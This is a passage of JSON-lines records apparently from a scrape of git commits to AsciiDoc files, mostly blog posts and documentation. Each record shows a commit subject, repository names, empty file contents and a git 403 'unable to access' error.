'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5a174eeb507abc85ae8a175fd38b3cfb68f8b64d","subject":"Update 2015-12-29-mBandroid-Tweaks-for-Microsoft-Band2.adoc","message":"Update 2015-12-29-mBandroid-Tweaks-for-Microsoft-Band2.adoc","repos":"alexandrev\/alexandrev.github.io,alexandrev\/alexandrev.github.io,alexandrev\/alexandrev.github.io","old_file":"_posts\/2015-12-29-mBandroid-Tweaks-for-Microsoft-Band2.adoc","new_file":"_posts\/2015-12-29-mBandroid-Tweaks-for-Microsoft-Band2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/alexandrev\/alexandrev.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"76f2aac4e0628adab67f9b13a75aa5d294825b11","subject":"lecture notes: dump from riseup etherpad","message":"lecture notes: dump from riseup etherpad","repos":"jzacsh\/netwtcpip-cmp405,jzacsh\/netwtcpip-cmp405,jzacsh\/netwtcpip-cmp405,jzacsh\/netwtcpip-cmp405","old_file":"lecture05_20170918.adoc","new_file":"lecture05_20170918.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jzacsh\/netwtcpip-cmp405.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"bee71f8d38097c7b897fe00f817d15a28a27cf90","subject":"Update 2016-11-05-About-the-Author.adoc","message":"Update 2016-11-05-About-the-Author.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-05-About-the-Author.adoc","new_file":"_posts\/2016-11-05-About-the-Author.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f1c0c8ad683dcd7cf75af6cf8ce956b8509f0639","subject":"Update 2015-08-27-copy-docker-images-from-one-docker-machine-to-another.adoc","message":"Update 2015-08-27-copy-docker-images-from-one-docker-machine-to-another.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2015-08-27-copy-docker-images-from-one-docker-machine-to-another.adoc","new_file":"_posts\/2015-08-27-copy-docker-images-from-one-docker-machine-to-another.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0dbacc6986eaca599b225e6216c78d6d25d8a1fd","subject":"Update 2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","message":"Update 2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","new_file":"_posts\/2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dafe3754c22a2e3ed55cbf4519fc3e4eea4127bf","subject":"Update 2015-05-20-UpdateErstellt-euren-eigenen-Gert.adoc","message":"Update 2015-05-20-UpdateErstellt-euren-eigenen-Gert.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"_posts\/2015-05-20-UpdateErstellt-euren-eigenen-Gert.adoc","new_file":"_posts\/2015-05-20-UpdateErstellt-euren-eigenen-Gert.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9b344c96dc6c845b179f93c4859e35860d6efe26","subject":"new blog: a decade of OptaPlanner","message":"new blog: a decade of OptaPlanner\n","repos":"droolsjbpm\/optaplanner-website,droolsjbpm\/optaplanner-website,droolsjbpm\/optaplanner-website","old_file":"blog\/2016-08-07-ADecadeOfOptaPlanner.adoc","new_file":"blog\/2016-08-07-ADecadeOfOptaPlanner.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/droolsjbpm\/optaplanner-website.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"bc16051c247dcf3d71f3f82cf87df09e863455d3","subject":"add Finnish article","message":"add Finnish article\n","repos":"droolsjbpm\/optaplanner-website,oskopek\/optaplanner-website,psiroky\/optaplanner-website,bibryam\/optaplanner-website,oskopek\/optaplanner-website,bibryam\/optaplanner-website,psiroky\/optaplanner-website,bibryam\/optaplanner-website,droolsjbpm\/optaplanner-website,psiroky\/optaplanner-website,droolsjbpm\/optaplanner-website,oskopek\/optaplanner-website","old_file":"learn\/testimonialsAndCaseStudies.adoc","new_file":"learn\/testimonialsAndCaseStudies.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oskopek\/optaplanner-website.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"61ce4110e6b0f2fd946c2168d079636ca24e8b88","subject":"Update 2016-03-05-Shoes-and-Knee-Pain.adoc","message":"Update 2016-03-05-Shoes-and-Knee-Pain.adoc","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-03-05-Shoes-and-Knee-Pain.adoc","new_file":"_posts\/2016-03-05-Shoes-and-Knee-Pain.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f69f957cd1e0c52210e3033472cc30b55babda2b","subject":"Update 2018-04-01-Why-did-you-do-that.adoc","message":"Update 2018-04-01-Why-did-you-do-that.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2018-04-01-Why-did-you-do-that.adoc","new_file":"_posts\/2018-04-01-Why-did-you-do-that.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1d7fc9a1000b3c36c9a0ed1018d2cebc4959edd5","subject":"Add ScheduleDSPods","message":"Add ScheduleDSPods\n","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"modules\/nodes-pods-daemonsets-pods.adoc","new_file":"modules\/nodes-pods-daemonsets-pods.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vikram-redhat\/openshift-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f5afcf24b75bc03ff19c6fca1b025a0c4cd29ab3","subject":"updated readme","message":"updated readme\n","repos":"BernhardLindner\/Image-Generator","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/BernhardLindner\/Image-Generator.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e7aba3a877d8e7aa76d51aa8ea780fd59cd1f8ea","subject":"Initial work on domain","message":"Initial work on domain\n","repos":"sergehuber\/contextserver-graphql-api","old_file":"docs\/index.adoc","new_file":"docs\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sergehuber\/contextserver-graphql-api.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"127cc5f047bc344d4adb6ce668c9a98fbb222aca","subject":"Update 2015-05-08-Estruccturas-de-Control-Bucles-For-While-doWhile.adoc","message":"Update 2015-05-08-Estruccturas-de-Control-Bucles-For-While-doWhile.adoc","repos":"Wurser\/wurser.github.io,Wurser\/wurser.github.io,Wurser\/wurser.github.io","old_file":"_posts\/2015-05-08-Estruccturas-de-Control-Bucles-For-While-doWhile.adoc","new_file":"_posts\/2015-05-08-Estruccturas-de-Control-Bucles-For-While-doWhile.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Wurser\/wurser.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"510290b3a4f985233d563e99c9ebbb3deb8ffd0e","subject":"fix header attr","message":"fix header attr\n","repos":"jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org","old_file":"docs\/modules\/sdk\/pages\/build_platform.adoc","new_file":"docs\/modules\/sdk\/pages\/build_platform.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jMonkeyEngine\/wiki.jmonkeyengine.org.git\/': The requested URL returned error: 403\n","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"1029695244c2a3c7e62df8bbc2cd29a7d4e3ca4c","subject":"update ID to UUID add collaborate + settings + url infos","message":"update ID to UUID\nadd collaborate + settings + url infos\n","repos":"adoc-editor\/editor-backend","old_file":"doc\/json\/datas-structure.adoc","new_file":"doc\/json\/datas-structure.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adoc-editor\/editor-backend.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8101a3c1eda7638e189ece3494709bc6c6ed85d9","subject":"y2b create post BlackBerry Q10 Unboxing \\u0026 Overview","message":"y2b create post BlackBerry Q10 Unboxing \\u0026 Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-05-07-BlackBerry-Q10-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2013-05-07-BlackBerry-Q10-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8701011ca0ad88e70201226d3128aefe4d71533c","subject":"Update 2016-05-05-Construindo-componentes-com-Angular-15.adoc","message":"Update 2016-05-05-Construindo-componentes-com-Angular-15.adoc","repos":"heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io","old_file":"_posts\/2016-05-05-Construindo-componentes-com-Angular-15.adoc","new_file":"_posts\/2016-05-05-Construindo-componentes-com-Angular-15.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/heliomsolivas\/heliomsolivas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dfcaf2ee5ab399aabd246a23b24d253c16f4c51f","subject":"Publish 2013-5-12-Linux-Notes.adoc","message":"Publish 2013-5-12-Linux-Notes.adoc","repos":"jrhea\/jrhea.github.io,jrhea\/jrhea.github.io,jrhea\/jrhea.github.io,jrhea\/jrhea.github.io","old_file":"2013-5-12-Linux-Notes.adoc","new_file":"2013-5-12-Linux-Notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jrhea\/jrhea.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c085a168cb8f89cfe62963b9fe14d30dd6427b22","subject":"Added symlink for Github.","message":"Added symlink for Github.\n","repos":"Yubico\/u2fval-client-php","old_file":"examples\/tutorial\/README.adoc","new_file":"examples\/tutorial\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Yubico\/u2fval-client-php.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"abafff769a58d0057ee559ac61c2adc79dadf534","subject":"Update 2018-05-28-Swift-Firestore.adoc","message":"Update 2018-05-28-Swift-Firestore.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-28-Swift-Firestore.adoc","new_file":"_posts\/2018-05-28-Swift-Firestore.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"721cf9bc4833b58a81465863f613e5439d7a9909","subject":"Update 2018-05-28-Swift-Firestore.adoc","message":"Update 2018-05-28-Swift-Firestore.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-28-Swift-Firestore.adoc","new_file":"_posts\/2018-05-28-Swift-Firestore.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3e45d52ee0fbbeded382ab2fd397aa55f342d75b","subject":"Update 1993-11-17.adoc","message":"Update 1993-11-17.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/1993-11-17.adoc","new_file":"_posts\/1993-11-17.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"314d03ea6fc784bd575973ca0c089c8413f16d8f","subject":"Update 2017-04-14-Radiation-Camping.adoc","message":"Update 2017-04-14-Radiation-Camping.adoc","repos":"mcornell\/OFM,mcornell\/OFM,mcornell\/OFM,mcornell\/OFM","old_file":"_posts\/2017-04-14-Radiation-Camping.adoc","new_file":"_posts\/2017-04-14-Radiation-Camping.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mcornell\/OFM.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bce947cc64a5d624a46228d8074d56c3feca01e6","subject":"Update 2019-06-22-The-Ideal-Woman.adoc","message":"Update 2019-06-22-The-Ideal-Woman.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2019-06-22-The-Ideal-Woman.adoc","new_file":"_posts\/2019-06-22-The-Ideal-Woman.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e4eb41b1fa051a30e8b8feb40e27eab904b8dc4e","subject":"corrected DMN REST API rule executions documentation (#774)","message":"corrected DMN REST API rule executions documentation (#774)\n\n","repos":"marcus-nl\/flowable-engine,yvoswillens\/flowable-engine,marcus-nl\/flowable-engine,paulstapleton\/flowable-engine,yvoswillens\/flowable-engine,lsmall\/flowable-engine,flowable\/flowable-engine,lsmall\/flowable-engine,marcus-nl\/flowable-engine,flowable\/flowable-engine,dbmalkovsky\/flowable-engine,paulstapleton\/flowable-engine,paulstapleton\/flowable-engine,dbmalkovsky\/flowable-engine,yvoswillens\/flowable-engine,marcus-nl\/flowable-engine,dbmalkovsky\/flowable-engine,dbmalkovsky\/flowable-engine,yvoswillens\/flowable-engine,flowable\/flowable-engine,flowable\/flowable-engine,lsmall\/flowable-engine,lsmall\/flowable-engine,paulstapleton\/flowable-engine","old_file":"docs\/userguide\/src\/en\/dmn\/ch07-REST.adoc","new_file":"docs\/userguide\/src\/en\/dmn\/ch07-REST.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/marcus-nl\/flowable-engine.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"05562fd83f27010af7311d1589d83f3eb52fba95","subject":"y2b create post What If You Could Get AirPods For Only $40?","message":"y2b create post What If You Could Get AirPods For Only $40?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-11-What%20If%20You%20Could%20Get%20AirPods%20For%20Only%20%2440%3F.adoc","new_file":"_posts\/2018-02-11-What%20If%20You%20Could%20Get%20AirPods%20For%20Only%20%2440%3F.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e40dd55056775f1115fb6293ad86227c4c0a1205","subject":"Update 2016-02-08-Service-Discovery-Proposal-merged-into-Kubernetes.adoc","message":"Update 2016-02-08-Service-Discovery-Proposal-merged-into-Kubernetes.adoc","repos":"KurtStam\/kurtstam.github.io,KurtStam\/kurtstam.github.io,KurtStam\/kurtstam.github.io","old_file":"_posts\/2016-02-08-Service-Discovery-Proposal-merged-into-Kubernetes.adoc","new_file":"_posts\/2016-02-08-Service-Discovery-Proposal-merged-into-Kubernetes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/KurtStam\/kurtstam.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f893e6a90ce3aff0d93ff0d0bf4d34644290ad9b","subject":"Update 2015-06-16-S-RAMP.adoc","message":"Update 2015-06-16-S-RAMP.adoc","repos":"KurtStam\/kurtstam.github.io,KurtStam\/kurtstam.github.io,KurtStam\/kurtstam.github.io","old_file":"_posts\/2015-06-16-S-RAMP.adoc","new_file":"_posts\/2015-06-16-S-RAMP.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/KurtStam\/kurtstam.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"61dc7ec27e2ee66aa8747f144dd461fff13619a3","subject":"Update 2015-08-10-Github.adoc","message":"Update 2015-08-10-Github.adoc","repos":"Desarrollo-FullStack\/Desarrollo-FullStack.github.io,Growth-Hacking-Marketing\/Growth-Hacking-Marketing.github.io,Growth-Hacking-Marketing\/Growth-Hacking-Marketing.github.io,AlonsoCampos\/AlonsoCampos.github.io,Desarrollo-FullStack\/Desarrollo-FullStack.github.io,Growth-Hacking-Marketing\/Growth-Hacking-Marketing.github.io,Desarrollo-FullStack\/Desarrollo-FullStack.github.io,AlonsoCampos\/AlonsoCampos.github.io,AlonsoCampos\/AlonsoCampos.github.io","old_file":"_posts\/2015-08-10-Github.adoc","new_file":"_posts\/2015-08-10-Github.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Desarrollo-FullStack\/Desarrollo-FullStack.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0b782f9353721442fb571e203a866a094814c313","subject":"Update 2016-11-06-Sunday.adoc","message":"Update 2016-11-06-Sunday.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-06-Sunday.adoc","new_file":"_posts\/2016-11-06-Sunday.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0fb526efc3d38e6dc10d7e18b3b4a99b5526d5c0","subject":"Publish 2016-6-28-PHPER-authority-control-RBAC.adoc","message":"Publish 2016-6-28-PHPER-authority-control-RBAC.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-28-PHPER-authority-control-RBAC.adoc","new_file":"2016-6-28-PHPER-authority-control-RBAC.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2aebeb19bfcabdf676fd5328829fd177f7104f0e","subject":"Update 2016-07-20-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","message":"Update 2016-07-20-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-20-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","new_file":"_posts\/2016-07-20-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"25e775a78ecfe90b5ac9de07163d52dabc151e47","subject":"y2b create post Blu Pure XL Unboxing","message":"y2b create post Blu Pure XL Unboxing","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-12-03-Blu-Pure-XL-Unboxing.adoc","new_file":"_posts\/2015-12-03-Blu-Pure-XL-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a1ce0d293120c7a5bc920cb9fb76d7c82b42da91","subject":"Update 2016-03-24-Hospitals-hit-by-Locky-ransomware.adoc","message":"Update 2016-03-24-Hospitals-hit-by-Locky-ransomware.adoc","repos":"fwalloe\/infosecbriefly,fwalloe\/infosecbriefly,fwalloe\/infosecbriefly,fwalloe\/infosecbriefly","old_file":"_posts\/2016-03-24-Hospitals-hit-by-Locky-ransomware.adoc","new_file":"_posts\/2016-03-24-Hospitals-hit-by-Locky-ransomware.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fwalloe\/infosecbriefly.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"12b010c7fbd6da2a0003e6b6a50d4dc48b1cb24c","subject":"Update 2015-05-30-Hello-World.adoc","message":"Update 2015-05-30-Hello-World.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-05-30-Hello-World.adoc","new_file":"_posts\/2015-05-30-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2bac0debdfd38cd31ad247a931581c1934a5dcab","subject":"Update 2016-09-02-Swift-Tuple.adoc","message":"Update 2016-09-02-Swift-Tuple.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-02-Swift-Tuple.adoc","new_file":"_posts\/2016-09-02-Swift-Tuple.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b96f45711ee3b27445050318471d5a3a748d3408","subject":"y2b create post Lew is sick...","message":"y2b create post Lew is sick...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-10-03-Lew-is-sick.adoc","new_file":"_posts\/2016-10-03-Lew-is-sick.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"06ddc38c7f17099b1545aed5defc335e14d12b1a","subject":"Update 2015-08-28-Demo.adoc","message":"Update 2015-08-28-Demo.adoc","repos":"expelled\/expelled.github.io,expelled\/expelled.github.io,expelled\/expelled.github.io","old_file":"_posts\/2015-08-28-Demo.adoc","new_file":"_posts\/2015-08-28-Demo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/expelled\/expelled.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fa3666076ae622a1cf6d92381e3f086058a1e85e","subject":"Update 2016-01-22-Demo.adoc","message":"Update 2016-01-22-Demo.adoc","repos":"iesextremadura\/iesextremadura.github.io,iesextremadura\/iesextremadura.github.io,iesextremadura\/iesextremadura.github.io","old_file":"_posts\/2016-01-22-Demo.adoc","new_file":"_posts\/2016-01-22-Demo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/iesextremadura\/iesextremadura.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"48e565693eec98c5392721a16dfbf09614e6bc24","subject":"Update 1993-8-11-commoncommonfunctionphp-Hubpress-blog-usedcommonphp.adoc","message":"Update 1993-8-11-commoncommonfunctionphp-Hubpress-blog-usedcommonphp.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/1993-8-11-commoncommonfunctionphp-Hubpress-blog-usedcommonphp.adoc","new_file":"_posts\/1993-8-11-commoncommonfunctionphp-Hubpress-blog-usedcommonphp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9174e55a57bca9af9105916eaf76e92e16953ae8","subject":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","message":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"038b19b471dcaec28254f585ab901f56c67a4082","subject":"Update 2015-05-04-Lancement-du-site.adoc","message":"Update 2015-05-04-Lancement-du-site.adoc","repos":"Fendi-project\/fendi-project.github.io,Fendi-project\/fendi-project.github.io,Fendi-project\/fendi-project.github.io","old_file":"_posts\/2015-05-04-Lancement-du-site.adoc","new_file":"_posts\/2015-05-04-Lancement-du-site.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Fendi-project\/fendi-project.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b484285f9b4137dc6a232f290aa6e634f23631f3","subject":"Update 2017-02-24-image-File-Reader.adoc","message":"Update 2017-02-24-image-File-Reader.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-24-image-File-Reader.adoc","new_file":"_posts\/2017-02-24-image-File-Reader.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9739ddd19a64f4f48c690f36997b9fe6310d116f","subject":"Update 2018-08-10-P-W-A-for-mahjong.adoc","message":"Update 2018-08-10-P-W-A-for-mahjong.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-10-P-W-A-for-mahjong.adoc","new_file":"_posts\/2018-08-10-P-W-A-for-mahjong.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 